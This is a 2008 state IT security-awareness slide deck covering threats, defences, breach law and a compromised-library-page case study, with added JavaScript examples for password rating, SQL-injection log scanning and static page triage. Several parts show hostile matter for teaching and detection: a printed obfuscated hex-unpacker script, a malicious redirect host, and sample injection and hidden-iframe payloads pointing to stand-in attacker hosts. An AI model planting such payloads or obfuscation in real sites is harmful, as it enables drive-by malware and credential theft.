Title: Cyber Security Awareness: Everything You Were Afraid to Know About Computer Security, But Always Wanted to Ask
Slide 1: Cyber Security Awareness: Everything You Were Afraid to Know About Computer Security, But Always Wanted to Ask
- Commonwealth of Mass.
- Information Technology Division
- November, 2008
Slide 2: Objectives for Today
- Understand network security threats
- Learn simple defensive measures
- Review some recent breaches
- Introduce applicable new legislation
Slide 3: The Sermon
- Sobering Statistics
- Why do we need to be here today?
- The Threats
- How Things Go Wrong
- Protecting Yourself
- Have I Been Compromised?
- A Few High-Profile Case Studies
- A Recent Eye-Opening Incident
- Security Resources and References
- Q & A
Slide 4: Statistics
- One new infected web page is discovered every 5 seconds
- One in 500 e-mail messages contains confidential information
- One in 2,500 e-mail messages contains an infected attachment
- 41% of people use the same password at every site they visit
- In 2007, 37,000 reported breaches of government and private systems occurred
- Revenues from cybercrime now exceed drug trafficking as the most lucrative illegal global business, estimated at more than $1 trillion annually in illegal profits
- 75 percent of companies surveyed in 2004 reported a data-security breach within the past 12 months. (The Ponemon Institute)
- 70% of security incidents are inside jobs. (Gartner Group)
- Many government offices don't even know yet that they are leaking information. 90% of cases are probably still not known. (McAfee Criminology Report)
Slide 5: Why are we here today?
- The World has Changed!
- Flying?
- Technology Advancements
- Moore's Law: 50 years of supporting data
- Processor Speed
- Memory (Smaller, Faster, Larger Capacity)
- Hard Drives (Smaller, with Larger Capacity)
- Price (Bang per Buck)
- What was Impossible 10 Years Ago is Routine Today.
- Searching for a Cure to Web Malware
Slide 6: Our Mission
- We still need to do our jobs
- Educating Students of the Commonwealth
- Securing Cyber-Resources
- ID Theft & Data Breach Legislation
- M.G.L. Ch 93H
- Executive Order 504
- 201 CMR 17.00
Slide 7: The Challenge
- Walking the tightrope between
- Taking full advantage of the constantly expanding wealth of IT resources available to us, and
- Increased risk of exposure to attacks that accompanies increased reliance on technology.
- Allowing business operations anytime and anywhere, via an increasing number of different devices and to an increasing number of mobile users and customers.
Slide 8: Threats to Students
- MySpace
- FaceBook
- YouTube
- Peer-to-Peer Networks
- Instant Messaging
- Cyber Predators/Bullies
- Inappropriate/Offensive Web Content
Slide 9: Threats to Networks
- Two primary categories of threat
- Denial of Service
- Loss/Leakage of Sensitive Data
Slide 10: Denial of Service (DoS)
- Definition
- Flooding a network with useless traffic, to the point of slowing or completely interrupting regular services
- Often in combination with groups of other remotely-controlled computers, a/k/a Bot Nets
- Result: Distributed Denial of Service (DDoS)
Slide 11: Data Loss/Leakage
- Definition
- Accidental leaking of sensitive information through sent data
- Refers to the transmission of data which are either sensitive or useful in the further exploitation of the system through standard data channels
- Result: compromise of data confidentiality
- Since 2005, more than 200 million victims of data breach have been reported!
Slide 12: How Things Go Wrong
- Actively
- User does something explicit to enable compromise
- Open an infected email attachment
- Follow a malicious web link
- Accept IM-initiated downloads
- Execute Web 2.0 rogue application
- Passively
- Attacker breaks into the user's PC via scans
- Unpatched operating system
- Buggy application software
- Vulnerable open ports
- Compromised legitimate web sites
Slide 13: How Things Go Wrong (cont.)
- Carelessness
- 98% of breaches are the result of stupidity or inadvertent user action. (IANS, 2007)
- Actions by Malicious Insiders
- 1.5% of breaches
- Efforts by Organized Crime, Industrial Spies, and Foreign Government Agents
- Least Frequent (< 0.5%), but Most Costly, Most Sophisticated, and Most Difficult to Detect and Defend Against
Slide 14: Who is Most Vulnerable?
- Those who don't patch regularly and don't keep A/V up to date
- Dial-up Users (but not very appealing to attackers)
- Home Broadband Users
- University Users
- Mobile Users
Slide 15: Protecting Yourself
- Patch, Patch, Patch!
- Use auto-update whenever possible
- Anti-Virus Software (update daily)
- Anti-SpyWare Software
- Personal Firewall Software
- Set and use good passwords on all accounts
- How Strong is Your Password?
- Encrypt Sensitive Data
- Separate Student and Teacher/Admin Networks
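A worked illustration of the "How Strong is Your Password?" question, added here as an example and not taken from the presentation. It rates a password two ways: a naive length-times-alphabet entropy estimate, and a lookup against a small constructed common-password list after undoing leetspeak and trailing-digit tricks, because the naive estimate alone would rate "P@ssw0rd1" as acceptable. The word list, the substitution table and the bit thresholds are assumptions made for the example.

```javascript
// Added example, not from the presentation: a rough "how strong is your password?"
// estimator. Two checks are combined: (1) a charset/length entropy estimate and
// (2) a lookup against a common-password list after undoing the usual leetspeak
// and trailing-digit tricks, since a naive entropy score alone rates "P@ssw0rd1"
// as decent even though it is just "password" in disguise.
// The list below is a constructed stand-in for a real breach-derived list.

const COMMON_PASSWORDS = new Set([
  'password', '123456', 'qwerty', 'letmein', 'welcome', 'abc123', 'monkey', 'football',
]);

// Size of the smallest alphabet that could have produced this password.
function charsetSize(pw) {
  let n = 0;
  if (/[a-z]/.test(pw)) n += 26;
  if (/[A-Z]/.test(pw)) n += 26;
  if (/[0-9]/.test(pw)) n += 10;
  if (/[^a-zA-Z0-9]/.test(pw)) n += 33; // printable ASCII punctuation and space
  return n;
}

// Naive entropy in bits: length * log2(alphabet size), rounded to a whole bit.
function entropyBits(pw) {
  if (pw.length === 0) return 0;
  return Math.round(pw.length * Math.log2(charsetSize(pw)));
}

// Strip trailing digits/punctuation, then undo common substitutions, so that
// "P@ssw0rd1" and "passw0rd!" both normalize to "password". Assumed table.
function normalize(pw) {
  return pw
    .toLowerCase()
    .replace(/[^a-z]+$/, '')
    .replace(/[@4]/g, 'a')
    .replace(/3/g, 'e')
    .replace(/[1!|]/g, 'i')
    .replace(/0/g, 'o')
    .replace(/[$5]/g, 's');
}

// Rating thresholds (40 / 64 bits) are assumptions for the example.
function ratePassword(pw) {
  const lowered = pw.toLowerCase();
  if (COMMON_PASSWORDS.has(lowered) || COMMON_PASSWORDS.has(normalize(pw))) {
    return { bits: 0, rating: 'common', reason: 'a common password or a trivial variant of one' };
  }
  const bits = entropyBits(pw);
  const rating = bits < 40 ? 'weak' : bits < 64 ? 'fair' : 'strong';
  return { bits, rating, reason: `${pw.length} characters over a ${charsetSize(pw)}-symbol alphabet` };
}

for (const pw of ['P@ssw0rd1', 'abcdefgh', 'xK9#mQ2vLp7!', 'correct horse battery staple']) {
  console.log(pw, ratePassword(pw));
}
```

The point of the normalization step is the order of checks: the common-list lookup runs before the entropy estimate, so a dressed-up dictionary word is rejected outright rather than being credited for its punctuation and digits.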
Slide 16: Protecting Yourself (cont.)
- Wireless Networks: Beware!
- Wireless Routers/Access Points
- Change default password and default SSID
- SSID name should be non-trivial
- Disable broadcasting of SSID if possible
- Enable WPA/WPA-2 encryption, and change default key
- Enable and use MAC filtering
- Don't save user IDs and passwords on your hard drive
- Don't Web surf from a privileged account!
- Turn off auto-run for removable media
- Practice Safe Internet
- E-mail attachments
- Downloads from Questionable Sites (esp. Freeware)
- Peer-to-Peer Networks & Promiscuous File Sharing
Slide 17: 10 Tips for Fighting Malware
- Install (and use!) Anti-Virus Software
- Install a Personal Firewall
- Install an Anti-Spyware Tool
- Patch!
- Keep Browser Security Settings at Medium or High
- Just Say No! to Orgs You Don't Know/Trust
- Avoid Browser Search-Help Bars
- Verify Software Certificates Trusted by Your Browser
- Get a Credit Card Only for Internet Shopping
- Don't Run Executable E-mail Attachments (Even From a Known Source)
Slide 18: Have I Been Compromised?
- How to tell if you've fallen victim
- Abnormal slowdown in performance
- Mysterious failures in commonly-used apps
- Email
- Web surfing
- Unexpected popups
- Mysterious/Unexpected outbound traffic
- The only sure-fire way to detect a compromise
- Cleaning a Bot
- Painful!
- Requires 8-16 hours of cleanup time
- Best if done by a professional
Slide 19: Data Breach & ID Theft
- M. G. L. c. 93H and 93I
- New law went into effect October 31, 2007
- Civil fine of up to $100 per affected person
- Executive Order 504
- Mandatory information security training
- Effective September 19, 2008
- Training for current staff within 12 months
- 201 CMR 17.00
- Mandates encryption of personal data
- Effective January 1, 2009
Slide 20: Cyber-Breach Poster Children
- Milton Academy Network Breach (Nov 07)
- Needham PowerSchool Breach (August 08)
- GOP Stolen Laptop Unencrypted (September 08)
- CardSystems Solutions
- TJX Companies, Inc.
- CitiFinancial Services
- Boston College
- Monster.com
- Massachusetts DPL
- Nordea Bank (Sweden)
Slide 21: In the News
- Commonwealth of PA, 1/4/08
- Network attacked via compromised agency web pages
- SQL injection used to update DB tables with links to malicious website
- Users who visit compromised agency's web site are silently redirected to a series of malicious web pages that try to exploit client-side (i.e., users') vulnerabilities in a number of applications: IE, RealPlayer, et al.
- Vulnerable systems become infected with malware
- An example of drive-by downloads
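Detection on the defender's side of the incident above, added as an example that is not part of the presentation: a scanner over constructed web-server log lines that flags requests whose URL-decoded query string carries a SQL statement of the kind used to plant links in database content. The log format, paths and the host evil.invalid are all constructed; the rules look for statement shape rather than bare keywords, so an ordinary search for "update on budget" is not flagged.

```javascript
// Added example, not from the presentation: scan web-server request logs for the
// kind of SQL injection described above, where a statement smuggled into a query
// parameter updated database content to embed a link to a malicious site.
// The log format, hosts and requests below are all constructed for this example.

// Constructed access-log lines: "<date> <time> <method> <path?query> <status>".
const SAMPLE_LOG = [
  '2008-01-04 10:15:01 GET /news.asp?id=42 200',
  // stacked UPDATE that appends a script tag to page bodies, then comments out the rest
  '2008-01-04 10:15:07 GET /news.asp?id=42;UPDATE%20pages%20SET%20body%3Dbody%2B%27%3Cscript%20src%3Dhttp://evil.invalid/x.js%3E%27-- 200',
  // a legitimate search containing the word "update": keyword matching alone would flag it
  '2008-01-04 10:15:09 GET /search.asp?q=update+on+budget 200',
  'not a request line at all',
];

// Detection rules look for statement shape, not bare keywords, to limit false positives.
const RULES = [
  { name: 'stacked-statement', re: /;\s*(?:update|insert|delete|declare|exec|drop)\b/i },
  { name: 'update-set', re: /\bupdate\s+[\w.\[\]]+\s+set\b/i },
  { name: 'comment-terminator', re: /(?:--|\/\*)\s*$/ },
  { name: 'markup-in-parameter', re: /<(?:script|iframe)\b/i },
];

// Parse one line; returns null for lines that do not match the expected format.
function parseRequestLine(line) {
  const m = /^(\S+ \S+) (\S+) (\S+) (\d{3})$/.exec(line);
  if (!m) return null;
  const target = m[3];
  const q = target.indexOf('?');
  const rawQuery = q === -1 ? '' : target.slice(q + 1);
  // Decode before matching: payloads arrive URL-encoded, and '+' means space in a query string.
  let query;
  try { query = decodeURIComponent(rawQuery.replace(/\+/g, ' ')); } catch (e) { query = rawQuery; }
  return { time: m[1], method: m[2], path: q === -1 ? target : target.slice(0, q), query, status: Number(m[4]) };
}

// Names of the rules that fire on a decoded query string.
function matchRules(query) {
  return RULES.filter((r) => r.re.test(query)).map((r) => r.name);
}

// One alert per request on which at least one rule fires.
function scanLog(lines) {
  const alerts = [];
  for (const line of lines) {
    const req = parseRequestLine(line);
    if (!req) continue;
    const rules = matchRules(req.query);
    if (rules.length > 0) alerts.push({ time: req.time, path: req.path, rules, query: req.query });
  }
  return alerts;
}

console.log(JSON.stringify(scanLog(SAMPLE_LOG), null, 2));
```

Decoding before matching is the part that matters in practice: the injected statement is invisible to a rule applied to the raw, percent-encoded line, and a rule that only looks for the word "update" would page the on-call engineer for every visitor searching the site.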
Slide 22: Evolving Threats to Users
- New and sophisticated forms of attack
- Customized viruses, self-modifying threats, and threats that attack back
- Attacks targeting new technologies
- Peer-to-peer and VoIP services
- Attacks targeting online social networks
- MySpace, Facebook, YouTube, etc.
- Attacks targeting online services
- Especially online banking
Slide 23: New Threat: Spamdexing
- Web Searches!
- 20% lead to unwanted content or malware sites
- 80% of search blocks point to offensive content
- Drive-by Downloads
- Compromised, legitimate web site silently redirects user to malware sites
- Mitigation: corporate safe web search tool
- Notify web users of potential risks in real time
Slide 24: Resources & References
- US-CERT (United States Computer Emergency Readiness Team): http://www.us-cert.gov/
- MS-ISAC (Multi-State Information Sharing and Access Center): http://www.msisac.org
- Identity Theft Research Center: http://www.idtheftcenter.org
Slide 25: Close to Home: a Lesson
- Analysis completed on October 30, 2007
- Involved breach of non-secret military network
- But could happen to anyone
- Attack vector?
- New York City public library!
Slide 26: NYC Public Library
Slide 27: NYC Public Library (cont.)
Slide 28: NYC Public Library (cont.)
Slide 29: NYC Public Library (cont.)
- Hidden in the bogus NYPL web page is...
- What's that???
Slide 30: NYC Public Library (cont.)
- What's really there:
- ..._id1" style="visibility: hidden; display: none"
- This redirects user to http://meraxe.com/fsp1/index.php
- This all happens silently and invisibly!
- What's at meraxe.com?
Slide 31: NYC Public Library (cont.)
- At meraxe.com, we find (a hex-unpacking script; its payload string literal is truncated on the slide):
    function v4726d05808fd9(v4726d058097a8) {
      // inner helper only returns the radix: each chunk is parsed as base 16
      function v4726d05809f78() { var v4726d0580a748 = 16; return v4726d0580a748; }
      return (parseInt(v4726d058097a8, v4726d05809f78()));
    }
    function v4726d0580af18(v4726d0580b6e8) {
      // inner helper only returns the chunk size: two hex digits per character
      function v4726d0580ce59() { var v4726d0580d630 = 2; return v4726d0580d630; }
      var v4726d0580beb8 = '';
      for (var v4726d0580c68d = 0; v4726d0580c68d < v4726d0580b6e8.length; v4726d0580c68d += v4726d0580ce59()) {
        // hex pair -> character code -> character; the result is the real, hidden markup
        v4726d0580beb8 += String.fromCharCode(v4726d05808fd9(v4726d0580b6e8.substr(v4726d0580c68d, v4726d0580ce59())));
      }
      return v4726d0580beb8;
    }
    document.write(v4726d0580af18('Truncated'));
- Effects
- The above code is (silently) downloaded and executed
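An analyst-side counterpart to slides 30 and 31, added as an example that is not from the presentation or from the compromised site: a static triage script that (1) finds tags styled invisible that load content from another host, the shape of the hidden tag on slide 30, and (2) recognizes the hex-unpacker shape of the script on slide 31, decodes its payload offline instead of letting document.write run it, and applies check (1) to the decoded text as well. The page host, the sample markup and the short unpacker embedded in the sample page are all constructed for the example; nothing from the page is executed.

```javascript
// Added example, not from the presentation or from the site it describes: static
// triage of a suspected compromised page, without executing any of its script.
//  1. Find tags that load content from another host while styled invisible
//     (visibility:hidden / display:none / zero size), the shape of slide 30.
//  2. Find the hex-unpacker pattern of slide 31 (parseInt per two-character chunk,
//     then String.fromCharCode), pull out its hex literal, decode it offline, and
//     run check 1 over the decoded text as well.
// The page host, the markup and the script below are all constructed.

const PAGE_HOST = 'www.example-library.invalid';

// Constructed hidden tag, hex-encoded the same way the slide-31 unpacker expects.
const HIDDEN_MARKUP = '<iframe src="http://malware.invalid/fsp1/index.php" width=0 height=0></iframe>';
const HEX_PAYLOAD = Buffer.from(HIDDEN_MARKUP, 'latin1').toString('hex');

// Constructed page: one hidden off-site iframe in clear, one delivered via the unpacker.
const SAMPLE_PAGE = `<html><body>
<h1>Library catalogue</h1>
<img src="/images/logo.png">
<iframe src="http://attacker.invalid/x.php" id="_id1" style="visibility: hidden; display: none"></iframe>
<script>
function a1(b1){function c1(){var d1=16;return d1}return(parseInt(b1,c1()))}
function e1(f1){function g1(){var h1=2;return h1}var s='';for(var i=0;i<f1.length;i+=g1()){s+=String.fromCharCode(a1(f1.substr(i,g1())))}return s}
document.write(e1('${HEX_PAYLOAD}'));
</script>
</body></html>`;

// Host of a src value; relative URLs resolve to the page's own host.
function hostOf(url) {
  try { return new URL(url, 'http://' + PAGE_HOST + '/').hostname; } catch (e) { return null; }
}

const HIDDEN_STYLE = /visibility\s*:\s*hidden|display\s*:\s*none/i;
const ZERO_SIZE = /\b(?:width|height)\s*=\s*["']?0\b/i;

// Check 1: resource-loading tags that are invisible and point off-site.
function findHiddenOffsiteLoads(html) {
  const hits = [];
  const tagRe = /<(iframe|script|img|object|embed)\b([^>]*)>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const attrs = m[2];
    const src = /\bsrc\s*=\s*["']?([^"'\s>]+)/i.exec(attrs);
    if (!src) continue;
    const host = hostOf(src[1]);
    const hidden = HIDDEN_STYLE.test(attrs) || ZERO_SIZE.test(attrs);
    if (host && host !== PAGE_HOST && hidden) hits.push({ tag: m[1].toLowerCase(), host, url: src[1] });
  }
  return hits;
}

// Check 2: decode the payload of any script that has the unpacker shape. Radix 16
// and chunk size 2 are taken from the slide-31 sample, which is why the hex
// literal can simply be decoded as bytes.
const UNPACKER_SHAPE = /parseInt\s*\([^)]*\)[\s\S]*?String\.fromCharCode/;
const HEX_LITERAL = /['"]([0-9a-fA-F]{8,})['"]/g;

function decodeHexPayloads(html) {
  const out = [];
  const scriptRe = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let s;
  while ((s = scriptRe.exec(html)) !== null) {
    if (!UNPACKER_SHAPE.test(s[1])) continue;
    HEX_LITERAL.lastIndex = 0;
    let lit;
    while ((lit = HEX_LITERAL.exec(s[1])) !== null) {
      if (lit[1].length % 2 === 0) out.push(Buffer.from(lit[1], 'hex').toString('latin1'));
    }
  }
  return out;
}

// Run both checks; findings that came out of a decoded payload are marked as such.
function triagePage(html) {
  const decodedPayloads = decodeHexPayloads(html);
  const findings = findHiddenOffsiteLoads(html);
  for (const text of decodedPayloads) {
    for (const hit of findHiddenOffsiteLoads(text)) findings.push({ fromDecodedPayload: true, ...hit });
  }
  return { decodedPayloads, findings };
}

console.log(JSON.stringify(triagePage(SAMPLE_PAGE), null, 2));
```

Visible off-site embeds are deliberately not reported, since legitimate pages load third-party content all the time; the signal is the combination of invisible styling (or zero size) with an off-site source, and a payload that only becomes markup after hex-unpacking is the second clue that something was planted rather than published.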
Slide 32: NYC Public Library (cont.)
- What happened???
- Downloaded and executed a file (age.exe)
- Added file C:\WINDOWS\system32\control.dll
- Added several Registry entries
- Control.dll is loaded as a Browser Helper Object (BHO) when IE is started and becomes a keylogger
- Deleted itself
- Effects
- Control.dll monitors data entered into forms in IE
- Steals user's login credentials for legitimate web sites
- On-line banking, credit cards, eBay, PayPal, etc., etc.
- Phones home with stolen data
Slide 33: Q & A
- Summary
- Protecting yourself is only half the battle
- Constant vigilance & awareness are a must
- "Trust, but verify." Ronald Reagan, quoting an old Russian (!) proverb
- Questions?